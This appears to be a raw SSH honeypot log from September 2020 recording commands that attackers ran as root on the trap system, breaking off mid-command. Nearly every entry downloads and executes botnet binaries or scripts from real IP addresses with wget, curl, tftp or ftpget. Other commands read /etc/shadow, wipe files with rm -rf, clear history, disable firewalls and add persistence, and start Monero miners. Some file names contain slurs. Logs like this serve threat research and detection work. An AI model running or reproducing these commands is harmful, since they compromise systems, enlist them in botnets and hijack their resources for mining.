ftpget -v -u anonymous -p anonymous -P 21 172.245.7.189 ftp1.sh ftp1.sh sh ftp1.sh rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh rm -rf * From 159.65.226.212 4-Sep-2020 22:09:19 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://scan.apollonet02.com/xZTYFDBXVSDVS456/HashtagFreeInternet.x86; cat HashtagFreeInternet.x86 > as0f5wq1dv0sw514qwd; chmod +x as0f5wq1dv0sw514qwd; ./as0f5wq1dv0sw514qwd Rooted.VPS; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://scan.apollonet02.com/xZTYFDBXVSDVS456/HashtagFreeInternet.x86 cat HashtagFreeInternet.x86 > as0f5wq1dv0sw514qwd chmod +x as0f5wq1dv0sw514qwd ./as0f5wq1dv0sw514qwd Rooted.VPS history -c From 223.70.163.54 5-Sep-2020 17:11:58 ssh2 root Exec nproc;; uname -a nproc uname -a From 194.87.138.137 5-Sep-2020 22:49:11 ssh2 root Exec wget http://185.132.53.238/bins/jKira.x86; chmod 777 jKira.x86; ./jKira.x86 roots; rm -rf jKira.x86; history -c wget http://185.132.53.238/bins/jKira.x86 chmod 777 jKira.x86 ./jKira.x86 roots rm -rf jKira.x86 history -c From 64.227.0.131 6-Sep-2020 09:18:54 ssh2 root Exec wget http://192.3.251.67/bins/Formula.x86 ; chmod 777 Formula.x86 ; ./Formula.x86 roots ; rm -rf Formula.x86* ; history -c wget http://192.3.251.67/bins/Formula.x86 chmod 777 Formula.x86 ./Formula.x86 roots rm -rf Formula.x86* history -c From 207.180.253.118 7-Sep-2020 07:05:27 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 34.92.63.217/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 34.92.63.217/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; wget 192.3.41.172/bins/Ares.x86 ; wget 192.3.41.172/bins/Ares.x32 ; chmod 777 x* ; ./Ares.x86 autoroot.x86 ; ./Ares.32 autoroot.x86 ; rm -rf x* ;history -c ; curl -O 192.3.41.172/bins/Ares.x86 ; curl -O 192.3.41.172/bins/Ares.x32 ; chmod 777 Ares* ; ./Ares.x86 autoroot.x86 ; ./Ares.x32 autoroot.x86 ; rm -rf x* ; history -c cat /etc/issue cd /tmp wget 34.92.63.217/bot.pl perl bot.pl rm -rf bot.pl curl -O 34.92.63.217/bot.pl perl bot.pl rm -rf bot.pl history -c wget 192.3.41.172/bins/Ares.x86 wget 192.3.41.172/bins/Ares.x32 chmod 777 x* ./Ares.x86 autoroot.x86 ./Ares.32 autoroot.x86 rm -rf x* history -c curl -O 192.3.41.172/bins/Ares.x86 curl -O 192.3.41.172/bins/Ares.x32 chmod 777 Ares* ./Ares.x86 autoroot.x86 ./Ares.x32 autoroot.x86 rm -rf x* history -c From 88.218.17.176 7-Sep-2020 22:36:10 ssh2 root Exec cd /tmp; wget http://172.245.104.116/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 servers; rm -rf * cd /tmp wget http://172.245.104.116/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64 chmod 777 * ./zbetcheckin.x86_64 servers rm -rf * From 45.95.168.157 8-Sep-2020 03:04:22 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.224.207/horny.sh; curl -O http:/37.49.224.207/horny.sh; chmod 777 horny.sh; sh horny.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://37.49.224.207/horny.sh curl -O http:/37.49.224.207/horny.sh chmod 777 horny.sh sh horny.sh rm -rf * Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.224.207/horny.sh; curl -O http:/37.49.224.207/horny.sh; chmod 777 horny.sh; sh horny.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://37.49.224.207/horny.sh curl -O http:/37.49.224.207/horny.sh chmod 777 horny.sh sh horny.sh rm -rf * From 198.91.86.83 8-Sep-2020 08:46:36 ssh2 root Exec uname -a;id;cat /etc/shadow;wget -qO - http://tung-shu.cf/o|perl;wget http://tung-shu.cf/x -O /tmp/x;chmod +x /tmp/x;/tmp/x;rm -f /tmp/x uname -a id cat /etc/shadow wget -qO - http://tung-shu.cf/o|perl wget http://tung-shu.cf/x -O /tmp/x chmod +x /tmp/x /tmp/x rm -f /tmp/x From 138.68.4.8 8-Sep-2020 12:11:57 ssh2 root Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l Exec ping 8.8.8.8 ping 8.8.8.8 From 35.226.189.158 8-Sep-2020 17:36:46 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 192.3.41.172/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 192.3.41.172/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue cd /tmp wget 192.3.41.172/bot.pl perl bot.pl rm -rf bot.pl curl -O 192.3.41.172/bot.pl perl bot.pl rm -rf bot.pl history -c From 178.62.106.98 9-Sep-2020 04:59:47 ssh2 root Exec nproc;cd /tmp;wget http://156.67.221.1/p.jpg;curl -O http://http://156.67.221.1/p.jpg;perl p.jpg;rm -rf p.*;rm -rf p.jpg nproc cd /tmp wget http://156.67.221.1/p.jpg curl -O http://http://156.67.221.1/p.jpg perl p.jpg rm -rf p.* rm -rf p.jpg From 45.95.168.126 9-Sep-2020 21:02:58 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.230/VPS.sh; cat VPS.sh > x0x524c1e4; chmod +x x0x524c1e4; ./x0x524c1e4; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.230/VPS.sh cat VPS.sh > x0x524c1e4 chmod +x x0x524c1e4 ./x0x524c1e4 history -c From 194.180.224.103 11-Sep-2020 16:39:06 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.112/LoliBinsXxX.sh; curl -O http://194.180.224.112/LoliBinsXxX.sh; chmod 777 LoliBinsXxX.sh; sh LoliBinsXxX.sh; tftp 194.180.224.112 -c get LoliBinsXxX.sh; chmod 777 LoliBinsXxX.sh; sh LoliBinsXxX.sh; tftp -r LoliBinsXxX2.sh -g 194.180.224.112; chmod 777 LoliBinsXxX2.sh; sh LoliBinsXxX2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.112 LoliBinsXxX1.sh LoliBinsXxX1.sh; sh LoliBinsXxX1.sh; rm -rf LoliBinsXxX.sh LoliBinsXxX.sh LoliBinsXxX2.sh LoliBinsXxX1.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.180.224.112/LoliBinsXxX.sh curl -O http://194.180.224.112/LoliBinsXxX.sh chmod 777 LoliBinsXxX.sh sh LoliBinsXxX.sh tftp 194.180.224.112 -c get LoliBinsXxX.sh chmod 777 LoliBinsXxX.sh sh LoliBinsXxX.sh tftp -r LoliBinsXxX2.sh -g 194.180.224.112 chmod 777 LoliBinsXxX2.sh sh LoliBinsXxX2.sh ftpget -v -u anonymous -p anonymous -P 21 194.180.224.112 LoliBinsXxX1.sh LoliBinsXxX1.sh sh LoliBinsXxX1.sh rm -rf LoliBinsXxX.sh LoliBinsXxX.sh LoliBinsXxX2.sh LoliBinsXxX1.sh rm -rf * From 2.57.122.204 12-Sep-2020 23:17:45 ssh2 root Exec cd /tmp; wget http://88.218.16.60/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 servers; rm -rf *;pkill ssh cd /tmp wget http://88.218.16.60/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64 chmod 777 * ./zbetcheckin.x86_64 servers rm -rf * pkill ssh From 193.228.91.11 13-Sep-2020 04:22:42 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.94/Otpzl/7rtya.x86; curl -O http://45.145.185.94/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.145.185.94/Otpzl/7rtya.x86 curl -O http://45.145.185.94/Otpzl/7rtya.x86 chmod +x 7rtya.x86 ./7rtya.x86 Exploit.x86 rm -rf 7rtya.x86 history -c From 175.24.123.205 13-Sep-2020 12:22:03 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://175.24.123.205:88/Ms;chmod 777 Ms;./Ms;echo "cd /tmp/">>/etc/rc.local;echo "./Ms&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://175.24.123.205:88/Ms chmod 777 Ms ./Ms echo "cd /tmp/">>/etc/rc.local echo "./Ms ">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 142.93.195.249 13-Sep-2020 18:28:52 ssh2 root Exec wget http://192.3.199.170/bins/Formula.x86 ; chmod 777 Formula.x86 ; ./Formula.x86 roots ; rm -rf Formula.* ; history -c wget http://192.3.199.170/bins/Formula.x86 chmod 777 Formula.x86 ./Formula.x86 roots rm -rf Formula.* history -c From 161.35.78.255 15-Sep-2020 00:00:40 ssh2 root Exec wget http://161.35.78.255/manager.sh -O- | sh || curl http://161.35.78.255/manager.sh | sh wget http://161.35.78.255/manager.sh -O- | sh || curl http://161.35.78.255/manager.sh | sh From 161.35.78.255 15-Sep-2020 00:00:41 ssh2 root Exec echo -en '\x6e\x65\x78\x75\x73' echo -en '\x6e\x65\x78\x75\x73' From 104.244.78.67 15-Sep-2020 04:12:23 ssh2 root Exec wget -O- http://www.bing.com wget -O- http://www.bing.com From 45.14.224.106 15-Sep-2020 05:16:08 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://45.14.224.106/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 45.14.224.106 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 45.14.224.106; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://45.14.224.106/Percocetbins.sh chmod 777 Percocetbins.sh sh Percocetbins.sh tftp 45.14.224.106 -c get Percocettftp1.sh chmod 777 Percocettftp1.sh sh Percocettftp1.sh tftp -r Percocettftp2.sh -g 45.14.224.106 chmod 777 Percocettftp2.sh sh Percocettftp2.sh rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh rm -rf * From 142.93.195.249 15-Sep-2020 22:31:40 ssh2 root Exec wget http://192.3.199.170/bins/Formula.x86; chmod 777 Formula.x86; ./Formula.x86 roots; rm -rf Formula.* ; history -c wget http://192.3.199.170/bins/Formula.x86 chmod 777 Formula.x86 ./Formula.x86 roots rm -rf Formula.* history -c From 212.33.199.173 16-Sep-2020 04:52:28 ssh2 root Exec cd /tmp; wget http://209.190.46.193/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 mnimaan; rm -rf * cd /tmp wget http://209.190.46.193/zbetcheckin.x86_64 chmod 777 * ./zbetcheckin.x86_64 mnimaan rm -rf * From 2.57.122.204 16-Sep-2020 14:43:32 ssh2 root Exec cd /tmp; wget http://209.190.46.193/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 servers; rm -rf *;pkill ssh cd /tmp wget http://209.190.46.193/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64 chmod 777 * ./zbetcheckin.x86_64 servers rm -rf * pkill ssh From 194.180.224.115 16-Sep-2020 15:12:16 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://37.49.224.207/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh; chmod 777 FuckBitchBastardDamnCuntJesusHaroldChristbins.sh; sh FuckBitchBastardDamnCuntJesusHaroldChristbins.sh; rm -rf * cat /etc/issue cd /tmp || cd /run || cd / wget http://37.49.224.207/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh chmod 777 FuckBitchBastardDamnCuntJesusHaroldChristbins.sh sh FuckBitchBastardDamnCuntJesusHaroldChristbins.sh rm -rf * From 165.232.70.17 17-Sep-2020 01:09:11 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://194.87.138.225/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 194.87.138.225 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 194.87.138.225; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://194.87.138.225/Percocetbins.sh chmod 777 Percocetbins.sh sh Percocetbins.sh tftp 194.87.138.225 -c get Percocettftp1.sh chmod 777 Percocettftp1.sh sh Percocettftp1.sh tftp -r Percocettftp2.sh -g 194.87.138.225 chmod 777 Percocettftp2.sh sh Percocettftp2.sh rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh rm -rf * From 5.14.57.253 17-Sep-2020 11:31:57 ssh2 root w lscpu ip a w wget http://130.0.164.120/scan.jpg wget http://130.0.164.120/scan.jpg --no-check-certificate curl -O http://130.0.164.120/scan.jpg lwp-download wget yum apt-get apt-get install curl apt-get install curl install curl curl install curl install curl curl curl install curl curl install curl install curl curl install curl install curl curl curl install curl curl curl install w who uname -a ls -a w curl apt-get install curl curl /usr/bin/curl find id richard lscpu ls -a From 141.98.81.141 17-Sep-2020 11:37:01 ssh2 root wget http://130.0.164.120/scan.jpg ls -a ls -a cat test1.pl cay proxy.doc cay proxy.doc cat proxy.doc halt reboot init 1 w apt-get install savatragmuie From 198.91.86.83 17-Sep-2020 21:27:58 ssh2 root Exec uname -a;id;cat /etc/shadow;wget http://tung-shu.cf/execute -O .bashrx;chmod +x .bashrx;./.bashrx;rm -f .bashrx uname -a id cat /etc/shadow wget http://tung-shu.cf/execute -O .bashrx chmod +x .bashrx ./.bashrx rm -f .bashrx From 34.95.213.154 17-Sep-2020 23:03:10 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 192.3.41.172/bot.pl ; perl bot.pl ; history -c cat /etc/issue cd /tmp wget 185.239.242.92/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* curl -O wget 185.239.242.92/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* wget 192.3.41.172/bot.pl perl bot.pl history -c From 95.111.254.164 18-Sep-2020 07:21:58 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.23.137.142/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 198.23.137.142 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://198.23.137.142/SnOoPy.sh chmod 777 * sh SnOoPy.sh tftp -g 198.23.137.142 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 193.228.91.11 18-Sep-2020 10:11:25 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/Otpzl/7rtya.x86; curl -O http://193.228.91.109/Otpzl/7rtya.x86; tftp 193.228.91.109 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86;rm -rf 7rtya.x86; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.109/Otpzl/7rtya.x86 curl -O http://193.228.91.109/Otpzl/7rtya.x86 tftp 193.228.91.109 -c get 7rtya.x86 chmod +x 7rtya.x86 ./7rtya.x86 Exploit.x86 rm -rf 7rtya.x86 history -c From 34.95.37.227 18-Sep-2020 15:29:32 ssh2 root Exec cat /etc/issue ; wget 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue wget 178.255.101.213/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 178.255.101.213/bot.pl perl bot.pl rm -rf bot.pl history -c From 129.211.205.21 19-Sep-2020 01:23:20 ssh2 root Exec nproc;uname -a;cd /tmp;rm -rf serv*;wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz;tar xf serv.tar.gz;cd serv;perl ug.txt;chmod +x * ;mv xmrig server;./server nproc uname -a cd /tmp rm -rf serv* wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz tar xf serv.tar.gz cd serv perl ug.txt chmod +x * mv xmrig server ./server From 77.39.117.226 19-Sep-2020 10:28:07 ssh2 root Exec nproc;uname -a;cd /tmp;rm -rf serv*;wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz; tar xf serv.tar.gz;perl ug.txt;cd serv;perl ug.txt;rm -rf ug.txt;mv xmrig server;./server nproc uname -a cd /tmp rm -rf serv* wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz tar xf serv.tar.gz perl ug.txt cd serv perl ug.txt rm -rf ug.txt mv xmrig server ./server From 212.33.199.172 19-Sep-2020 14:04:17 ssh2 root Exec cd /tmp; wget http://88.218.16.60/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 mnimaan; rm -rf * cd /tmp wget http://88.218.16.60/zbetcheckin.x86_64 chmod 777 * ./zbetcheckin.x86_64 mnimaan rm -rf * From 45.95.168.157 19-Sep-2020 15:11:01 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.224.207/horny.sh; curl -O http:/37.49.224.207/horny.sh; chmod 777 horny.sh; sh horny.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://37.49.224.207/horny.sh curl -O http:/37.49.224.207/horny.sh chmod 777 horny.sh sh horny.sh rm -rf * From 77.39.117.226 19-Sep-2020 15:56:44 ssh2 root Exec npeoc;uname -a;cd /tmp;rm -rf serv*;wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz; tar xf serv.tar.gz;perl ug.txt;cd serv;perl ug.txt;rm -rf ug.txt;mv xmrig server;./server npeoc uname -a cd /tmp rm -rf serv* wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz tar xf serv.tar.gz perl ug.txt cd serv perl ug.txt rm -rf ug.txt mv xmrig server ./server From 45.14.224.164 19-Sep-2020 18:45:12 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://45.14.224.110/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 45.14.224.110 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 45.14.224.110; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://45.14.224.110/Percocetbins.sh chmod 777 Percocetbins.sh sh Percocetbins.sh tftp 45.14.224.110 -c get Percocettftp1.sh chmod 777 Percocettftp1.sh sh Percocettftp1.sh tftp -r Percocettftp2.sh -g 45.14.224.110 chmod 777 Percocettftp2.sh sh Percocettftp2.sh rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh rm -rf * From 35.234.143.159 20-Sep-2020 03:32:29 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue cd /tmp wget 185.239.242.92/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* curl -O wget 185.239.242.92/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* wget 178.255.101.213/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 178.255.101.213/bot.pl perl bot.pl rm -rf bot.pl history -c From 193.239.147.224 20-Sep-2020 13:21:05 ssh2 root Exec nc 1 1; echo lmfao goodbye; cat /etc/issue nc 1 1 echo lmfao goodbye cat /etc/issue From 193.228.91.11 20-Sep-2020 15:59:22 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.94/Otpzl/vwd.x86; curl -O http://45.145.185.94/Otpzl/vwd.x86; chmod +x vwd.x86; ./vwd.x86 Exploit.x86; rm -rf vwd.x86; tftp 45.145.185.94 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 TFTP.Exploit.x86;rm -rf 7rtya.x86; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.145.185.94/Otpzl/vwd.x86 curl -O http://45.145.185.94/Otpzl/vwd.x86 chmod +x vwd.x86 ./vwd.x86 Exploit.x86 rm -rf vwd.x86 tftp 45.145.185.94 -c get 7rtya.x86 chmod +x 7rtya.x86 ./7rtya.x86 TFTP.Exploit.x86 rm -rf 7rtya.x86 history -c From 37.49.230.184 20-Sep-2020 18:31:19 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.230.184/Lizard.sh; chmod 777 Lizard.sh; sh Lizard.sh; tftp 37.49.230.184 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 37.49.230.184; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.49.230.184 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf Lizard.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://37.49.230.184/Lizard.sh chmod 777 Lizard.sh sh Lizard.sh tftp 37.49.230.184 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 37.49.230.184 chmod 777 tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 37.49.230.184 ftp1.sh ftp1.sh sh ftp1.sh rm -rf Lizard.sh tftp1.sh tftp2.sh ftp1.sh rm -rf * From 194.180.224.115 20-Sep-2020 22:29:06 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.112/pipe.sh; curl -O http://194.180.224.112/pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp 194.180.224.112 -c get pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp -r pipe2.sh -g 194.180.224.112; chmod 777 pipe2.sh; sh pipe2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.112 pipe1.sh pipe1.sh; sh pipe1.sh; rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.180.224.112/pipe.sh curl -O http://194.180.224.112/pipe.sh chmod 777 pipe.sh sh pipe.sh tftp 194.180.224.112 -c get pipe.sh chmod 777 pipe.sh sh pipe.sh tftp -r pipe2.sh -g 194.180.224.112 chmod 777 pipe2.sh sh pipe2.sh ftpget -v -u anonymous -p anonymous -P 21 194.180.224.112 pipe1.sh pipe1.sh sh pipe1.sh rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh rm -rf * Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 194.180.224.115 20-Sep-2020 22:29:27 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.112/pipe.sh; curl -O http://194.180.224.112/pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp 194.180.224.112 -c get pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp -r pipe2.sh -g 194.180.224.112; chmod 777 pipe2.sh; sh pipe2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.112 pipe1.sh pipe1.sh; sh pipe1.sh; rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.180.224.112/pipe.sh curl -O http://194.180.224.112/pipe.sh chmod 777 pipe.sh sh pipe.sh tftp 194.180.224.112 -c get pipe.sh chmod 777 pipe.sh sh pipe.sh tftp -r pipe2.sh -g 194.180.224.112 chmod 777 pipe2.sh sh pipe2.sh ftpget -v -u anonymous -p anonymous -P 21 194.180.224.112 pipe1.sh pipe1.sh sh pipe1.sh rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh rm -rf * From 151.80.34.123 21-Sep-2020 04:47:28 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ;wget nasapaul.com/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 45P2hmaiEzFcw2ZDGCAUko1Q13AAA8f6PMkvsqC3sSWzDxoSF5DRDFTVH5RJosNiggCri7k4CqyhZBbHoHaqExe62p62qxE -p rut -k --tls -B cat /etc/issue cd /tmp wget 185.239.242.92/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* curl -O wget 185.239.242.92/nigga.x86 chmod 777 nigga.x86 ./nigga.x86 autorooter.x86 rm -rf nigga* wget 178.255.101.213/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 178.255.101.213/bot.pl perl bot.pl rm -rf bot.pl history -c wget nasapaul.com/cnrig chmod 777 cnrig ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 45P2hmaiEzFcw2ZDGCAUko1Q13AAA8f6PMkvsqC3sSWzDxoSF5DRDFTVH5RJosNiggCri7k4CqyhZBbHoHaqExe62p62qxE -p rut -k --tls -B From 194.180.224.103 21-Sep-2020 06:06:43 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.224.207/pipe.sh; curl -O http://37.49.224.207/pipe.sh; chmod 777 pipe.sh; sh pipe.sh; rm -rf pipe.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://37.49.224.207/pipe.sh curl -O http://37.49.224.207/pipe.sh chmod 777 pipe.sh sh pipe.sh rm -rf pipe.sh rm -rf * From 134.122.124.220 21-Sep-2020 07:01:41 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://207.154.200.148/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 207.154.200.148 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 207.154.200.148; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://207.154.200.148/Percocetbins.sh chmod 777 Percocetbins.sh sh Percocetbins.sh tftp 207.154.200.148 -c get Percocettftp1.sh chmod 777 Percocettftp1.sh sh Percocettftp1.sh tftp -r Percocettftp2.sh -g 207.154.200.148 chmod 777 Percocettftp2.sh sh Percocettftp2.sh rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh rm -rf * From 193.228.91.109 21-Sep-2020 10:37:29 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.94/Otpzl/7rtya.x86; curl -O http://45.145.185.94/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86.x86; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.145.185.94/Otpzl/7rtya.x86 curl -O http://45.145.185.94/Otpzl/7rtya.x86 chmod +x 7rtya.x86 ./7rtya.x86 Exploit.x86 rm -rf 7rtya.x86.x86 history -c From 194.180.224.115 21-Sep-2020 14:19:04 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.224.207/pipe.sh; curl -O http://37.49.224.207/pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp 37.49.224.207 -c get 